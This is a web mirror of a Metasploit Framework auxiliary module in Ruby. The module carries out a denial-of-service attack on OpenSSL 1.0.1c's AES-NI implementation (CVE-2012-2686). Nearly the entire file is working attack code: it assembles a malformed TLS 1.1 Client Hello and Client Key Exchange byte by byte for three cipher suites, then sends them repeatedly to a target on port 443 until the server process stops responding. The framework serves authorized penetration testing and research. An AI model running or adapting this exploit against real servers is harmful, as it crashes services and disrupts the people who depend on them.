CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/ssl/openssl_aesni.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# auxiliary/dos/ssl/openssl_aesni

7
class MetasploitModule < Msf::Auxiliary

8
  include Msf::Exploit::Remote::Tcp

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'		=> 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS',

14
      'Description'	=> %q{

15
          The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the

16
        length of an encrypted message when used with a TLS version 1.1 or above. This

17
        leads to an integer underflow which can cause a DoS. The vulnerable function

18
        aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.

19
        This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default

20
        OpenSSL 1.0.1c package.

21
      },

22
      'Author'	=>

23
        [

24
          'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'

25
        ],

26
      'License'		=> MSF_LICENSE,

27
      'References'	=>

28
        [

29
          [ 'CVE', '2012-2686'],

30
          [ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]

31
        ],

32
      'DisclosureDate' => '2013-02-05'))

33


34
    register_options(

35
      [

36
        Opt::RPORT(443),

37
        OptInt.new('MAX_TRIES', [true,  "Maximum number of tries", 300])

38
      ])

39
  end

40


41
  def run

42
    # Client Hello

43
    p1 =  "\x16"				# Content Type: Handshake

44
    p1 << "\x03\x01"				# Version: TLS 1.0

45
    p1 << "\x00\x7e"				# Length: 126

46
    p1 << "\x01"				# Handshake Type: Client Hello

47
    p1 << "\x00\x00\x7a"			# Length: 122

48
    p1 << "\x03\x02"				# Version: TLS 1.1

49
    p1 << ("A" * 32)				# Random

50
    p1 << "\x00"				# Session ID Length: 0

51
    p1 << "\x00\x08"				# Cypher Suites Length: 6

52
    p1 << "\xc0\x13"				# - ECDHE-RSA-AES128-SHA

53
    p1 << "\x00\x39"				# - DHE-RSA-AES256-SHA

54
    p1 << "\x00\x35"				# - AES256-SHA

55
    p1 << "\x00\xff"				# - EMPTY_RENEGOTIATION_INFO_SCSV

56
    p1 << "\x01"				# Compression Methods Length: 1

57
    p1 << "\x00"				# - NULL-Compression

58
    p1 << "\x00\x49"				# Extensions Length: 73

59
    p1 << "\x00\x0b"				# - Extension: ec_point_formats

60
    p1 << "\x00\x04"				#   Length: 4

61
    p1 << "\x03"				#   EC Points Format Length: 3

62
    p1 << "\x00"				#   - uncompressed

63
    p1 << "\x01"				#   - ansiX962_compressed_prime

64
    p1 << "\x02"				#   - ansiX962_compressed_char2

65
    p1 << "\x00\x0a"				# - Extension: elliptic_curves

66
    p1 << "\x00\x34"				#   Length: 52

67
    p1 << "\x00\x32"				#   Elliptic Curves Length: 50

68
    # 25 Elliptic curves:

69
    p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"

70
    p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"

71
    p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"

72
    p1 << "\x00\x11"

73


74
    p1 << "\x00\x23"				# - Extension: SessionTicket TLS

75
    p1 << "\x00\x00"				#   Length: 0

76
    p1 << "\x00\x0f"				# - Extension: Heartbeat

77
    p1 << "\x00\x01"				#   Length: 1

78
    p1 << "\x01"				#   Peer allowed to send requests

79


80


81
    # Change Cipher Spec Message

82
    p2_cssm =  "\x14"				# Content Type: Change Cipher Spec

83
    p2_cssm << "\x03\x02"			# Version: TLS 1.1

84
    p2_cssm << "\x00\x01"			# Length: 1

85
    p2_cssm << "\x01"				# Change Cipher Spec Message

86


87


88
    # Encrypted Handshake Message

89
    p2_ehm =  "\x16"				# Content Type: Handshake

90
    p2_ehm << "\x03\x02"			# Version: TLS 1.1

91
    p2_ehm << "\x00\x40"			# Length: 64

92
    p2_ehm << ("A" * 64)			# Encrypted Message

93


94


95
    # Client Key Exchange, Change Cipher Spec, Encrypted Handshake

96
    # AES256-SHA

97
    p2_aes_sha =  "\x16"			# Content Type: Handshake

98
    p2_aes_sha << "\x03\x02"			# Version: TLS 1.1

99
    p2_aes_sha << "\x01\x06"			# Length: 262

100
    p2_aes_sha << "\x10"			# Handshake Type: Client Key Exchange

101
    p2_aes_sha << "\x00\x01\x02"		# Length: 258

102
    p2_aes_sha << "\x01\x00"			# Encrypted PreMaster Length: 256

103
    p2_aes_sha << ("\x00" * 256)		# Encrypted PresMaster (irrelevant)

104
    p2_aes_sha << p2_cssm 			# Change Cipher Spec Message

105
    p2_aes_sha << p2_ehm			# Encrypted Handshake Message

106


107


108
    # DHE-RSA-AES256-SHA

109
    p2_dhe =  "\x16"				# Content Type: Handshake

110
    p2_dhe << "\x03\x02"			# Version: TLS 1.1

111
    p2_dhe << "\x00\x46"			# Length: 70

112
    p2_dhe << "\x10"				# Handshake Type: Client Key Exchange

113
    p2_dhe << "\x00\x00\x42"			# Length: 66

114
    p2_dhe << "\x00\x40"			# DH Pubkey Length: 64

115
    p2_dhe << ("A" * 64)			# DH Pubkey

116
    p2_dhe << p2_cssm				# Change Cipher Spec Message

117
    p2_dhe << p2_ehm				# Encrypted Handshake Message

118


119


120
    # ECDHE-RSA-AES128-SHA

121
    p2_ecdhe =  "\x16"				# Content Type: Handshake

122
    p2_ecdhe << "\x03\x02"			# Version: TLS 1.1

123
    p2_ecdhe << "\x00\x46"			# Length: 70

124
    p2_ecdhe << "\x10"				# Handshake Type: Client Key Exchange

125
    p2_ecdhe << "\x00\x00\x42"			# Length: 66

126
    p2_ecdhe << "\x41"				# EC DH Pubkey Length: 65

127
    # EC DH Pubkey:

128
    p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"

129
    p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"

130
    p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"

131
    p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73"

132
    p2_ecdhe << "\x40"

133
    p2_ecdhe << p2_cssm				# Change Cipher Spec Message

134
    p2_ecdhe << p2_ehm				# Encrypted Handshake Message

135


136


137
    maxtries = datastore['MAX_TRIES']

138


139
    success = false

140


141
    for i in 0..maxtries

142
      print_status("Try \##{i}")

143


144
      connect

145


146
      sock.put(p1)

147
      resp = sock.get_once

148


149
      cs = get_cipher_suite(resp)

150


151
      if cs == 0xc013 # ECDHE-RSA-AES128-SHA

152
        p2 = p2_ecdhe

153
      elsif cs == 0x0039 # DHE-RSA-AES256-SHA

154
        p2 = p2_dhe

155
      elsif cs == 0x0035 # AES256-SHA

156
        p2 = p2_aes_sha

157
      else

158
        print_error("No common ciphers!")

159
        return

160
      end

161


162
      sock.put(p2)

163


164
      alert = nil

165


166
      begin

167
        alert = sock.get_once(-1, 2)

168
      rescue EOFError

169
        print_good("DoS successful. process on #{rhost} did not respond.")

170
        success = true

171
        break

172
      end

173


174
      disconnect

175


176
    end

177


178
    if success == false

179
      print_error("DoS unsuccessful.")

180
    end

181
  end

182


183
  def get_cipher_suite(resp)

184
    offset = 0

185


186
    while offset < resp.length

187
      type = (resp[offset, 1]).unpack("C")[0]

188


189
      if not type == 22 # Handshake

190
        return nil

191
      end

192


193
      len = (resp[offset+3, 2]).unpack("n")[0]

194
      hstype = (resp[offset+5, 1]).unpack("C")[0]

195


196
      if hstype == 2 # Server Hello

197
        return (resp[offset+44, 2]).unpack("n")[0]

198
      end

199


200
      offset += len

201
    end

202


203
  end

204
end

205


206


207